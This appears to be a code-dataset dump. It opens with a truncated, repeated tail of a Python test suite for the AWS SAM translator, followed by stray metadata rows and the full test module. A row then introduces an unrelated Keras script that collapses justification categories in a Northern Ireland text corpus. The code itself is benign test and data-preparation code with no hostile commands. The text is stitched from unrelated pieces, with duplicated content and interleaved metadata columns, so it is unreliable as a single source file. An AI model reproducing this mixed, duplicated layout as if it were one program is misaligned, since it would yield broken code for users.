translator = Translator({}, sam_parser)
translator.translate(template, {})
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_throws_when_resource_is_empty(self):
template = {
"Resources": {}
}
with self.assertRaises(InvalidDocumentException):
sam_parser = Parser()
translator = Translator({}, sam_parser)
translator.translate(template, {})
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_throws_when_resource_is_not_dict(self):
template = {
"Resources": [1,2,3]
}
with self.assertRaises(InvalidDocumentException):
sam_parser = Parser()
translator = Translator({}, sam_parser)
translator.translate(template, {})
class TestPluginsUsage(TestCase):
# Tests if plugins are properly injected into the translator
@patch("samtranslator.translator.translator.make_policy_template_for_function_plugin")
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_prepare_plugins_must_add_required_plugins(self, make_policy_template_for_function_plugin_mock):
# This is currently the only required plugin
plugin_instance = BasePlugin("something")
make_policy_template_for_function_plugin_mock.return_value = plugin_instance
sam_plugins = prepare_plugins([])
self.assertEqual(5, len(sam_plugins))
@patch("samtranslator.translator.translator.make_policy_template_for_function_plugin")
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_prepare_plugins_must_merge_input_plugins(self, make_policy_template_for_function_plugin_mock):
required_plugin = BasePlugin("something")
make_policy_template_for_function_plugin_mock.return_value = required_plugin
custom_plugin = BasePlugin("someplugin")
sam_plugins = prepare_plugins([custom_plugin])
self.assertEqual(6, len(sam_plugins))
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_prepare_plugins_must_handle_empty_input(self):
sam_plugins = prepare_plugins(None)
self.assertEqual(5, len(sam_plugins))
@patch("samtranslator.translator.translator.PolicyTemplatesProcessor")
@patch("samtranslator.translator.translator.PolicyTemplatesForFunctionPlugin")
def test_make_policy_template_for_function_plugin_must_work(self,
policy_templates_for_function_plugin_mock,
policy_templates_processor_mock):
default_templates = {"some": "value"}
policy_templates_processor_mock.get_default_policy_templates_json.return_value = default_templates
# mock to return instance of the processor
processor_instance = Mock()
policy_templates_processor_mock.return_value = processor_instance
# mock for plugin instance
plugin_instance = Mock()
policy_templates_for_function_plugin_mock.return_value = plugin_instance
result = make_policy_template_for_function_plugin()
self.assertEqual(plugin_instance, result)
policy_templates_processor_mock.get_default_policy_templates_json.assert_called_once_with()
policy_templates_processor_mock.assert_called_once_with(default_templates)
policy_templates_for_function_plugin_mock.assert_called_once_with(processor_instance)
@patch.object(Resource, "from_dict")
@patch("samtranslator.translator.translator.SamPlugins")
@patch("samtranslator.translator.translator.prepare_plugins")
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
def test_transform_method_must_inject_plugins_when_creating_resources(self,
prepare_plugins_mock,
sam_plugins_class_mock,
resource_from_dict_mock):
manifest = {
'Resources': {
'MyTable': {
'Type': 'AWS::Serverless::SimpleTable',
'Properties': {
}
}
}
}
sam_plugins_object_mock = Mock()
sam_plugins_class_mock.return_value = sam_plugins_object_mock
prepare_plugins_mock.return_value = sam_plugins_object_mock
resource_from_dict_mock.return_value = SamSimpleTable("MyFunction")
initial_plugins = [1,2,3]
sam_parser = Parser()
translator = Translator({}, sam_parser, plugins=initial_plugins)
translator.translate(manifest, {})
resource_from_dict_mock.assert_called_with("MyTable",
manifest["Resources"]["MyTable"],
sam_plugins=sam_plugins_object_mock)
prepare_plugins_mock.assert_called_once_with(initial_plugins)
def get_policy_mock():
mock_policy_loader = MagicMock()
mock_policy_loader.load.return_value = {
'AmazonDynamoDBFullAccess': 'arn:aws:iam::aws:policy/AmazonDynamoDBFullAccess',
'AmazonDynamoDBReadOnlyAccess': 'arn:aws:iam::aws:policy/AmazonDynamoDBReadOnlyAccess',
'AWSLambdaRole': 'arn:aws:iam::aws:policy/service-role/AWSLambdaRole',
}
return mock_policy_loader
def get_deployment_key(fragment):
logical_id, value = get_resource_by_type(fragment, "AWS::ApiGateway::Deployment")
return logical_id
def get_resource_by_type(template, type):
resources = template["Resources"]
for key in resources:
value = resources[key]
if "Type" in value and value.get("Type") == type:
return key, value
def get_exception_error_message(e):
return reduce(lambda message, error: message + ' ' + error.message, e.value.causes, e.value.message)
| 40.530682
| 131
| 0.672386
|
import json
import itertools
import os.path
import hashlib
import sys
from functools import reduce, cmp_to_key
from samtranslator.translator.translator import Translator, prepare_plugins, make_policy_template_for_function_plugin
from samtranslator.parser.parser import Parser
from samtranslator.model.exceptions import InvalidDocumentException, InvalidResourceException
from samtranslator.model import Resource
from samtranslator.model.sam_resources import SamSimpleTable
from samtranslator.public.plugins import BasePlugin
from tests.translator.helpers import get_template_parameter_values
from tests.plugins.application.test_serverless_app_plugin import mock_get_region
from samtranslator.yaml_helper import yaml_parse
from parameterized import parameterized, param
import pytest
import yaml
from unittest import TestCase
from samtranslator.translator.transform import transform
from mock import Mock, MagicMock, patch
BASE_PATH = os.path.dirname(__file__)
INPUT_FOLDER = BASE_PATH + '/input'
OUTPUT_FOLDER = BASE_PATH + '/output'
DO_NOT_SORT = ['Layers']
BASE_PATH = os.path.dirname(__file__)
INPUT_FOLDER = os.path.join(BASE_PATH, 'input')
OUTPUT_FOLDER = os.path.join(BASE_PATH, 'output')
def deep_sort_lists(value):
if isinstance(value, dict):
return {k: deep_sort_lists(v) for k, v in value.items()}
if isinstance(value, list):
if sys.version_info.major < 3:
# Py2 can sort lists with complex types like dictionaries
return sorted((deep_sort_lists(x) for x in value))
else:
# Py3 cannot sort lists with complex types. Hence a custom comparator function
return sorted((deep_sort_lists(x) for x in value), key=cmp_to_key(custom_list_data_comparator))
else:
return value
def custom_list_data_comparator(obj1, obj2):
if isinstance(obj1, dict) and isinstance(obj2, dict):
obj1 = json.dumps(obj1, sort_keys=True)
obj2 = json.dumps(obj2, sort_keys=True)
try:
return (obj1 > obj2) - (obj1 < obj2)
# In Py3 a TypeError will be raised if obj1 and obj2 are different types or uncomparable
except TypeError:
s1, s2 = type(obj1).__name__, type(obj2).__name__
return (s1 > s2) - (s1 < s2)
def mock_sar_service_call(self, service_call_function, logical_id, *args):
application_id = args[0]
status = 'ACTIVE'
if application_id == "no-access":
raise InvalidResourceException(logical_id, "Cannot access application: {}.".format(application_id))
elif application_id == "non-existent":
raise InvalidResourceException(logical_id, "Cannot access application: {}.".format(application_id))
elif application_id == "invalid-semver":
raise InvalidResourceException(logical_id, "Cannot access application: {}.".format(application_id))
elif application_id == 1:
raise InvalidResourceException(logical_id, "Type of property 'ApplicationId' is invalid.".format(application_id))
elif application_id == "preparing" and self._wait_for_template_active_status < 2:
self._wait_for_template_active_status += 1
self.SLEEP_TIME_SECONDS = 0
self.TEMPLATE_WAIT_TIMEOUT_SECONDS = 2
status = "PREPARING"
elif application_id == "preparing-never-ready":
self._wait_for_template_active_status = True
self.SLEEP_TIME_SECONDS = 0
self.TEMPLATE_WAIT_TIMEOUT_SECONDS = 0
status = "PREPARING"
elif application_id == "expired":
status = "EXPIRED"
message = {
'ApplicationId': args[0],
'CreationTime': 'x',
'ExpirationTime': 'x',
'SemanticVersion': '1.1.1',
'Status': status,
'TemplateId': 'id-xx-xx',
'TemplateUrl': 'https://awsserverlessrepo-changesets-xxx.s3.amazonaws.com/signed-url'
}
return message
# implicit_api, explicit_api, explicit_api_ref, api_cache tests currently have deployment IDs hardcoded in output file.
# These ids are generated using sha1 hash of the swagger body for implicit
# api and s3 location for explicit api.
class TestTranslatorEndToEnd(TestCase):
@parameterized.expand(
itertools.product([
's3_with_condition',
'function_with_condition',
'basic_function',
'basic_application',
'application_preparing_state',
'basic_layer',
'cloudwatchevent',
'cloudwatch_logs_with_ref',
'cloudwatchlog',
'streams',
'sqs',
'simpletable',
'simpletable_with_sse',
'implicit_api',
'explicit_api',
'api_endpoint_configuration',
'api_with_auth_all_maximum',
'api_with_auth_all_minimum',
'api_with_auth_no_default',
'api_with_method_settings',
'api_with_binary_media_types',
'api_with_minimum_compression_size',
'api_with_resource_refs',
'api_with_cors',
'api_with_cors_and_only_methods',
'api_with_cors_and_only_headers',
'api_with_cors_and_only_origins',
'api_with_cors_and_only_maxage',
'api_with_cors_and_only_credentials_false',
'api_with_cors_no_definitionbody',
'api_cache',
'api_with_access_log_setting',
'api_with_canary_setting',
'api_with_xray_tracing',
's3',
's3_create_remove',
's3_existing_lambda_notification_configuration',
's3_existing_other_notification_configuration',
's3_filter',
's3_multiple_events_same_bucket',
's3_multiple_functions',
's3_with_dependsOn',
'sns',
'sns_existing_other_subscription',
'sns_topic_outside_template',
'alexa_skill',
'alexa_skill_with_skill_id',
'iot_rule',
'layers_with_intrinsics',
'layers_all_properties',
'function_managed_inline_policy',
'unsupported_resources',
'intrinsic_functions',
'basic_function_with_tags',
'depends_on',
'function_event_conditions',
'function_with_dlq',
'function_with_kmskeyarn',
'function_with_alias',
'function_with_alias_intrinsics',
'function_with_disabled_deployment_preference',
'function_with_deployment_preference',
'function_with_deployment_preference_all_parameters',
'function_with_deployment_preference_multiple_combinations',
'function_with_alias_and_event_sources',
'function_with_resource_refs',
'function_with_deployment_and_custom_role',
'function_with_deployment_no_service_role',
'function_with_global_layers',
'function_with_layers',
'function_with_many_layers',
'function_with_permissions_boundary',
'function_with_policy_templates',
'function_with_sns_event_source_all_parameters',
'globals_for_function',
'globals_for_api',
'globals_for_simpletable',
'all_policy_templates',
'simple_table_ref_parameter_intrinsic',
'simple_table_with_table_name',
'function_concurrency',
'simple_table_with_extra_tags',
'explicit_api_with_invalid_events_config',
'no_implicit_api_with_serverless_rest_api_resource',
'implicit_api_with_serverless_rest_api_resource',
'implicit_api_with_auth_and_conditions_max',
'implicit_api_with_many_conditions',
'implicit_and_explicit_api_with_conditions',
'api_with_cors_and_conditions_no_definitionbody',
'api_with_auth_and_conditions_all_max'
],
[
("aws", "ap-southeast-1"),
("aws-cn", "cn-north-1"),
("aws-us-gov", "us-gov-west-1")
] # Run all the above tests against each of the list of partitions to test against
)
)
@patch('samtranslator.plugins.application.serverless_app_plugin.ServerlessAppPlugin._sar_service_call', mock_sar_service_call)
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_transform_success(self, testcase, partition_with_region):
partition = partition_with_region[0]
region = partition_with_region[1]
manifest = yaml_parse(open(os.path.join(INPUT_FOLDER, testcase + '.yaml'), 'r'))
# To uncover unicode-related bugs, convert dict to JSON string and parse JSON back to dict
manifest = json.loads(json.dumps(manifest))
partition_folder = partition if partition != "aws" else ""
expected = json.load(open(os.path.join(OUTPUT_FOLDER,partition_folder, testcase + '.json'), 'r'))
with patch('boto3.session.Session.region_name', region):
parameter_values = get_template_parameter_values()
mock_policy_loader = MagicMock()
mock_policy_loader.load.return_value = {
'AWSLambdaBasicExecutionRole': 'arn:{}:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole'.format(partition),
'AmazonDynamoDBFullAccess': 'arn:{}:iam::aws:policy/AmazonDynamoDBFullAccess'.format(partition),
'AmazonDynamoDBReadOnlyAccess': 'arn:{}:iam::aws:policy/AmazonDynamoDBReadOnlyAccess'.format(partition),
'AWSLambdaRole': 'arn:{}:iam::aws:policy/service-role/AWSLambdaRole'.format(partition),
}
output_fragment = transform(
manifest, parameter_values, mock_policy_loader)
print(json.dumps(output_fragment, indent=2))
# Only update the deployment Logical Id hash in Py3.
if sys.version_info.major >= 3:
self._update_logical_id_hash(expected)
self._update_logical_id_hash(output_fragment)
assert deep_sort_lists(output_fragment) == deep_sort_lists(expected)
def _update_logical_id_hash(self, resources):
output_resources = resources.get("Resources", {})
deployment_logical_id_dict = {}
rest_api_to_swagger_hash = {}
dict_of_things_to_delete = {}
# Find all RestApis in the template
for logical_id, resource_dict in output_resources.items():
if "AWS::ApiGateway::RestApi" == resource_dict.get("Type"):
resource_properties = resource_dict.get("Properties", {})
if "Body" in resource_properties:
self._generate_new_deployment_hash(logical_id, resource_properties.get("Body"), rest_api_to_swagger_hash)
elif "BodyS3Location" in resource_dict.get("Properties"):
self._generate_new_deployment_hash(logical_id,
resource_properties.get("BodyS3Location"),
rest_api_to_swagger_hash)
# Collect all APIGW Deployments LogicalIds and generate the new ones
for logical_id, resource_dict in output_resources.items():
if "AWS::ApiGateway::Deployment" == resource_dict.get("Type"):
resource_properties = resource_dict.get("Properties", {})
rest_id = resource_properties.get("RestApiId").get("Ref")
data_hash = rest_api_to_swagger_hash.get(rest_id)
description = resource_properties.get("Description")[:-len(data_hash)]
resource_properties["Description"] = description + data_hash
new_logical_id = logical_id[:-10] + data_hash[:10]
deployment_logical_id_dict[logical_id] = new_logical_id
dict_of_things_to_delete[logical_id] = (new_logical_id, resource_dict)
# Update References to APIGW Deployments
for logical_id, resource_dict in output_resources.items():
if "AWS::ApiGateway::Stage" == resource_dict.get("Type"):
resource_properties = resource_dict.get("Properties", {})
rest_id = resource_properties.get("RestApiId", {}).get("Ref", "")
data_hash = rest_api_to_swagger_hash.get(rest_id)
deployment_id = resource_properties.get("DeploymentId", {}).get("Ref")
new_logical_id = deployment_logical_id_dict.get(deployment_id, "")[:-10]
new_logical_id = new_logical_id + data_hash[:10]
resource_properties.get("DeploymentId", {})["Ref"] = new_logical_id
# To avoid mutating the template while iterating, delete only after find everything to update
for logical_id_to_remove, tuple_to_add in dict_of_things_to_delete.items():
output_resources[tuple_to_add[0]] = tuple_to_add[1]
del output_resources[logical_id_to_remove]
# Update any Output References in the template
for output_key, output_value in resources.get("Outputs", {}).items():
if output_value.get("Ref") in deployment_logical_id_dict:
output_value["Ref"] = deployment_logical_id_dict[output_value.get("Ref")]
def _generate_new_deployment_hash(self, logical_id, dict_to_hash, rest_api_to_swagger_hash):
data_bytes = json.dumps(dict_to_hash, separators=(',', ':'), sort_keys=True).encode("utf8")
data_hash = hashlib.sha1(data_bytes).hexdigest()
rest_api_to_swagger_hash[logical_id] = data_hash
@pytest.mark.parametrize('testcase', [
'error_api_duplicate_methods_same_path',
'error_api_invalid_auth',
'error_api_invalid_definitionuri',
'error_api_invalid_definitionbody',
'error_api_invalid_restapiid',
'error_application_properties',
'error_application_does_not_exist',
'error_application_no_access',
'error_application_preparing_timeout',
'error_cors_on_external_swagger',
'error_invalid_cors_dict',
'error_cors_credentials_true_with_wildcard_origin',
'error_cors_credentials_true_without_explicit_origin',
'error_function_invalid_codeuri',
'error_function_invalid_layer',
'error_function_no_codeuri',
'error_function_no_handler',
'error_function_no_runtime',
'error_function_with_deployment_preference_missing_alias',
'error_function_with_invalid_deployment_preference_hook_property',
'error_invalid_logical_id',
'error_layer_invalid_properties',
'error_missing_queue',
'error_missing_startingposition',
'error_missing_stream',
'error_multiple_resource_errors',
'error_s3_not_in_template',
'error_table_invalid_attributetype',
'error_invalid_resource_parameters',
'error_reserved_sam_tag',
'existing_event_logical_id',
'existing_permission_logical_id',
'existing_role_logical_id',
'error_invalid_template',
'error_globals_is_not_dict',
'error_globals_unsupported_type',
'error_globals_unsupported_property',
'error_globals_api_with_stage_name',
'error_function_policy_template_with_missing_parameter',
'error_function_policy_template_invalid_value',
'error_function_with_unknown_policy_template',
'error_function_with_invalid_policy_statement'
])
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('samtranslator.plugins.application.serverless_app_plugin.ServerlessAppPlugin._sar_service_call', mock_sar_service_call)
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_transform_invalid_document(testcase):
manifest = yaml_parse(open(os.path.join(INPUT_FOLDER, testcase + '.yaml'), 'r'))
expected = json.load(open(os.path.join(OUTPUT_FOLDER, testcase + '.json'), 'r'))
mock_policy_loader = MagicMock()
parameter_values = get_template_parameter_values()
with pytest.raises(InvalidDocumentException) as e:
transform(manifest, parameter_values, mock_policy_loader)
error_message = get_exception_error_message(e)
assert error_message == expected.get('errorMessage')
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_transform_unhandled_failure_empty_managed_policy_map():
document = {
'Transform': 'AWS::Serverless-2016-10-31',
'Resources': {
'Resource': {
'Type': 'AWS::Serverless::Function',
'Properties': {
'CodeUri': 's3://bucket/key',
'Handler': 'index.handler',
'Runtime': 'nodejs4.3',
'Policies': 'AmazonS3FullAccess'
}
}
}
}
parameter_values = get_template_parameter_values()
mock_policy_loader = MagicMock()
mock_policy_loader.load.return_value = {}
with pytest.raises(Exception) as e:
transform(document, parameter_values, mock_policy_loader)
error_message = str(e.value)
assert error_message == 'Managed policy map is empty, but should not be.'
def assert_metric_call(mock, transform, transform_failure=0, invalid_document=0):
metric_dimensions = [
{
'Name': 'Transform',
'Value': transform
}
]
mock.put_metric_data.assert_called_once_with(
Namespace='ServerlessTransform',
MetricData=[
{
'MetricName': 'TransformFailure',
'Value': transform_failure,
'Unit': 'Count',
'Dimensions': metric_dimensions
},
{
'MetricName': 'InvalidDocument',
'Value': invalid_document,
'Unit': 'Count',
'Dimensions': metric_dimensions
}
]
)
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_swagger_body_sha_gets_recomputed():
document = {
'Transform': 'AWS::Serverless-2016-10-31',
'Resources': {
'Resource': {
'Type': 'AWS::Serverless::Api',
'Properties': {
"StageName": "Prod",
"DefinitionBody": {
# Some body property will do
"a": "b"
}
}
}
}
}
mock_policy_loader = get_policy_mock()
parameter_values = get_template_parameter_values()
output_fragment = transform(document, parameter_values, mock_policy_loader)
print(json.dumps(output_fragment, indent=2))
deployment_key = get_deployment_key(output_fragment)
assert deployment_key
# Now let's change the Body property and transform again
document["Resources"]["Resource"]["Properties"]["DefinitionBody"]["a"] = "foo"
output_fragment = transform(document, parameter_values, mock_policy_loader)
deployment_key_changed = get_deployment_key(output_fragment)
assert deployment_key_changed
assert deployment_key != deployment_key_changed
output_fragment = transform(document, parameter_values, mock_policy_loader)
assert get_deployment_key(output_fragment) == deployment_key_changed
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_swagger_definitionuri_sha_gets_recomputed():
document = {
'Transform': 'AWS::Serverless-2016-10-31',
'Resources': {
'Resource': {
'Type': 'AWS::Serverless::Api',
'Properties': {
"StageName": "Prod",
"DefinitionUri": "s3://bucket/key"
}
}
}
}
mock_policy_loader = get_policy_mock()
parameter_values = get_template_parameter_values()
output_fragment = transform(document, parameter_values, mock_policy_loader)
print(json.dumps(output_fragment, indent=2))
deployment_key = get_deployment_key(output_fragment)
assert deployment_key
# Now let's change the Body property and transform again
document["Resources"]["Resource"]["Properties"]["DefinitionUri"] = "s3://bucket/key1/key2"
output_fragment = transform(document, parameter_values, mock_policy_loader)
deployment_key_changed = get_deployment_key(output_fragment)
assert deployment_key_changed
assert deployment_key != deployment_key_changed
output_fragment = transform(document, parameter_values, mock_policy_loader)
assert get_deployment_key(output_fragment) == deployment_key_changed
class TestFunctionVersionWithParameterReferences(TestCase):
def setUp(self):
self.document = {
'Transform': 'AWS::Serverless-2016-10-31',
'Resources': {
'MyFunction': {
'Type': 'AWS::Serverless::Function',
'Properties': {
"Runtime": "nodejs4.3",
"Handler": "index.handler",
"CodeUri": {
"Bucket": {"Ref": "SomeBucket"},
"Key": {"Ref": "CodeKeyParam"}
},
"AutoPublishAlias": "live"
}
}
}
}
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_logical_id_change_with_parameters(self):
parameter_values = {
'CodeKeyParam': 'value1'
}
first_transformed_template = self._do_transform(self.document, parameter_values)
parameter_values["CodeKeyParam"] = "value2"
second_transformed_template = self._do_transform(self.document, parameter_values)
first_version_id, _ = get_resource_by_type(first_transformed_template, "AWS::Lambda::Version")
second_version_id, _ = get_resource_by_type(second_transformed_template, "AWS::Lambda::Version")
assert first_version_id != second_version_id
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_logical_id_remains_same_without_parameter_change(self):
parameter_values = {
'CodeKeyParam': 'value1'
}
first_transformed_template = self._do_transform(self.document, parameter_values)
second_transformed_template = self._do_transform(self.document, parameter_values)
first_version_id, _ = get_resource_by_type(first_transformed_template, "AWS::Lambda::Version")
second_version_id, _ = get_resource_by_type(second_transformed_template, "AWS::Lambda::Version")
assert first_version_id == second_version_id
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_logical_id_without_resolving_reference(self):
# Now value of `CodeKeyParam` is not present in document
first_transformed_template = self._do_transform(self.document)
second_transformed_template = self._do_transform(self.document)
first_version_id, _ = get_resource_by_type(first_transformed_template, "AWS::Lambda::Version")
second_version_id, _ = get_resource_by_type(second_transformed_template, "AWS::Lambda::Version")
assert first_version_id == second_version_id
def _do_transform(self, document, parameter_values=get_template_parameter_values()):
mock_policy_loader = get_policy_mock()
output_fragment = transform(document, parameter_values, mock_policy_loader)
print(json.dumps(output_fragment, indent=2))
return output_fragment
class TestParameterValuesHandling(TestCase):
def test_add_default_parameter_values_must_merge(self):
parameter_values = {
"Param1": "value1"
}
sam_template = {
"Parameters": {
"Param2": {
"Type": "String",
"Default": "template default"
}
}
}
expected = {
"Param1": "value1",
"Param2": "template default"
}
sam_parser = Parser()
translator = Translator({}, sam_parser)
result = translator._add_default_parameter_values(sam_template,
parameter_values)
self.assertEqual(expected, result)
def test_add_default_parameter_values_must_override_user_specified_values(self):
parameter_values = {
"Param1": "value1"
}
sam_template = {
"Parameters": {
"Param1": {
"Type": "String",
"Default": "template default"
}
}
}
expected = {
"Param1": "value1"
}
sam_parser = Parser()
translator = Translator({}, sam_parser)
result = translator._add_default_parameter_values(sam_template, parameter_values)
self.assertEqual(expected, result)
def test_add_default_parameter_values_must_skip_params_without_defaults(self):
parameter_values = {
"Param1": "value1"
}
sam_template = {
"Parameters": {
"Param1": {
"Type": "String"
},
"Param2": {
"Type": "String"
}
}
}
expected = {
"Param1": "value1"
}
sam_parser = Parser()
translator = Translator({}, sam_parser)
result = translator._add_default_parameter_values(sam_template, parameter_values)
self.assertEqual(expected, result)
@parameterized.expand([
# Array
param(["1", "2"]),
# String
param("something"),
# Some other non-parameter looking dictionary
param({"Param1": {"Foo": "Bar"}}),
param(None)
])
def test_add_default_parameter_values_must_ignore_invalid_template_parameters(self, template_parameters):
parameter_values = {
"Param1": "value1"
}
expected = {
"Param1": "value1"
}
sam_template = {
"Parameters": template_parameters
}
sam_parser = Parser()
translator = Translator({}, sam_parser)
result = translator._add_default_parameter_values(
sam_template, parameter_values)
self.assertEqual(expected, result)
class TestTemplateValidation(TestCase):
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_throws_when_resource_not_found(self):
template = {
"foo": "bar"
}
with self.assertRaises(InvalidDocumentException):
sam_parser = Parser()
translator = Translator({}, sam_parser)
translator.translate(template, {})
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_throws_when_resource_is_empty(self):
template = {
"Resources": {}
}
with self.assertRaises(InvalidDocumentException):
sam_parser = Parser()
translator = Translator({}, sam_parser)
translator.translate(template, {})
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_throws_when_resource_is_not_dict(self):
template = {
"Resources": [1,2,3]
}
with self.assertRaises(InvalidDocumentException):
sam_parser = Parser()
translator = Translator({}, sam_parser)
translator.translate(template, {})
class TestPluginsUsage(TestCase):
# Tests if plugins are properly injected into the translator
@patch("samtranslator.translator.translator.make_policy_template_for_function_plugin")
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_prepare_plugins_must_add_required_plugins(self, make_policy_template_for_function_plugin_mock):
# This is currently the only required plugin
plugin_instance = BasePlugin("something")
make_policy_template_for_function_plugin_mock.return_value = plugin_instance
sam_plugins = prepare_plugins([])
self.assertEqual(5, len(sam_plugins))
@patch("samtranslator.translator.translator.make_policy_template_for_function_plugin")
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_prepare_plugins_must_merge_input_plugins(self, make_policy_template_for_function_plugin_mock):
required_plugin = BasePlugin("something")
make_policy_template_for_function_plugin_mock.return_value = required_plugin
custom_plugin = BasePlugin("someplugin")
sam_plugins = prepare_plugins([custom_plugin])
self.assertEqual(6, len(sam_plugins))
@patch('botocore.client.ClientEndpointBridge._check_default_region', mock_get_region)
def test_prepare_plugins_must_handle_empty_input(self):
sam_plugins = prepare_plugins(None)
self.assertEqual(5, len(sam_plugins))
@patch("samtranslator.translator.translator.PolicyTemplatesProcessor")
@patch("samtranslator.translator.translator.PolicyTemplatesForFunctionPlugin")
def test_make_policy_template_for_function_plugin_must_work(self,
policy_templates_for_function_plugin_mock,
policy_templates_processor_mock):
default_templates = {"some": "value"}
policy_templates_processor_mock.get_default_policy_templates_json.return_value = default_templates
# mock to return instance of the processor
processor_instance = Mock()
policy_templates_processor_mock.return_value = processor_instance
# mock for plugin instance
plugin_instance = Mock()
policy_templates_for_function_plugin_mock.return_value = plugin_instance
result = make_policy_template_for_function_plugin()
self.assertEqual(plugin_instance, result)
policy_templates_processor_mock.get_default_policy_templates_json.assert_called_once_with()
policy_templates_processor_mock.assert_called_once_with(default_templates)
policy_templates_for_function_plugin_mock.assert_called_once_with(processor_instance)
@patch.object(Resource, "from_dict")
@patch("samtranslator.translator.translator.SamPlugins")
@patch("samtranslator.translator.translator.prepare_plugins")
@patch('boto3.session.Session.region_name', 'ap-southeast-1')
def test_transform_method_must_inject_plugins_when_creating_resources(self,
prepare_plugins_mock,
sam_plugins_class_mock,
resource_from_dict_mock):
manifest = {
'Resources': {
'MyTable': {
'Type': 'AWS::Serverless::SimpleTable',
'Properties': {
}
}
}
}
sam_plugins_object_mock = Mock()
sam_plugins_class_mock.return_value = sam_plugins_object_mock
prepare_plugins_mock.return_value = sam_plugins_object_mock
resource_from_dict_mock.return_value = SamSimpleTable("MyFunction")
initial_plugins = [1,2,3]
sam_parser = Parser()
translator = Translator({}, sam_parser, plugins=initial_plugins)
translator.translate(manifest, {})
resource_from_dict_mock.assert_called_with("MyTable",
manifest["Resources"]["MyTable"],
sam_plugins=sam_plugins_object_mock)
prepare_plugins_mock.assert_called_once_with(initial_plugins)
def get_policy_mock():
mock_policy_loader = MagicMock()
mock_policy_loader.load.return_value = {
'AmazonDynamoDBFullAccess': 'arn:aws:iam::aws:policy/AmazonDynamoDBFullAccess',
'AmazonDynamoDBReadOnlyAccess': 'arn:aws:iam::aws:policy/AmazonDynamoDBReadOnlyAccess',
'AWSLambdaRole': 'arn:aws:iam::aws:policy/service-role/AWSLambdaRole',
}
return mock_policy_loader
def get_deployment_key(fragment):
logical_id, value = get_resource_by_type(fragment, "AWS::ApiGateway::Deployment")
return logical_id
def get_resource_by_type(template, type):
resources = template["Resources"]
for key in resources:
value = resources[key]
if "Type" in value and value.get("Type") == type:
return key, value
def get_exception_error_message(e):
return reduce(lambda message, error: message + ' ' + error.message, e.value.causes, e.value.message)
| true
| true
|
1c40c0d4965fe7922c46178338e7efc5b2a3a77c
| 7,754
|
py
|
Python
|
class_nn/embeddings_google.py
|
jmhernan/NIreland_NLP
|
c360c4978452e80575db2e0eed9ef540ed83b5c6
|
[
"MIT"
] | null | null | null |
class_nn/embeddings_google.py
|
jmhernan/NIreland_NLP
|
c360c4978452e80575db2e0eed9ef540ed83b5c6
|
[
"MIT"
] | null | null | null |
class_nn/embeddings_google.py
|
jmhernan/NIreland_NLP
|
c360c4978452e80575db2e0eed9ef540ed83b5c6
|
[
"MIT"
] | null | null | null |
######################################################
### Builds NN using google embeddings, parameters ###
### Uses: justifications_clean_text_ohe.csv ###
###### Collapses justifications to 6 categories. ###
###### Stems and tokenizes words ###
### Next step: Sarah needs to talk through w Jose ###
### What is the difference bw this NN and the one ###
### built by "baseline_neural_network.py"? ###
######################################################
import numpy as np
import pandas as pd
import nltk
from keras.utils.np_utils import to_categorical
from keras.preprocessing.text import Tokenizer
from keras import models
from keras import layers
from keras.models import Sequential
from keras.layers import Dense
from keras.wrappers.scikit_learn import KerasClassifier
from keras.utils import np_utils
from keras import utils
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import KFold
from sklearn.preprocessing import LabelEncoder
from sklearn.pipeline import Pipeline
import os
from nltk.stem import PorterStemmer
from sklearn.model_selection import train_test_split
from gensim.models import KeyedVectors
## Set the file pathway and download corpus
this_file_path = os.path.abspath(__file__)
folder_root = os.path.split(this_file_path)[0]
repo_root = os.path.split(folder_root)[0]
repo_path = os.path.join(repo_root)
PATH_TO_GV = os.path.join(folder_root, 'wordvec') + '/'
df = pd.read_csv(os.path.join(repo_path, 'justifications_clean_text_ohe.csv'))
# Collapse justification categories from 12 to 6 -- approach #2
df['just_category_6'] = df['justification_cat']
df['just_category_6'] = df['just_category_6'].replace(['J_Emergency-Policy', 'J_Intelligence', 'J_Last-resort', 'J_Utilitarian-Deterrence', 'J_Law-and-order'], 'J_Security')
df['just_category_6'] = df['just_category_6'].replace(['J_Legal_Procedure'], 'J_Legal')
df['just_category_6'] = df['just_category_6'].replace(['J_Political-Strategic'], 'J_Political')
df['just_category_6'] = df['just_category_6'].replace(['J_Denial', 'J_Intl-Domestic_Precedent'], 'J_DenyHRVio') #
df['just_category_6'] = df['just_category_6'].replace(['J_Development-Unity'], 'J_Misc')
df['just_categories'] = df['just_category_6']
# Create a unique number id for each justification category
col = ['just_categories', 'clean_text']
df = df[col]
df = df[pd.notnull(df['clean_text'])]
df.columns = ['just_categories', 'clean_text']
df['category_id'] = df['just_categories'].factorize()[0]
category_id_df = df[['just_categories', 'category_id']].drop_duplicates().sort_values('category_id')
category_to_id = dict(category_id_df.values)
id_to_category = dict(category_id_df[['category_id', 'just_categories']].values)
df.head()
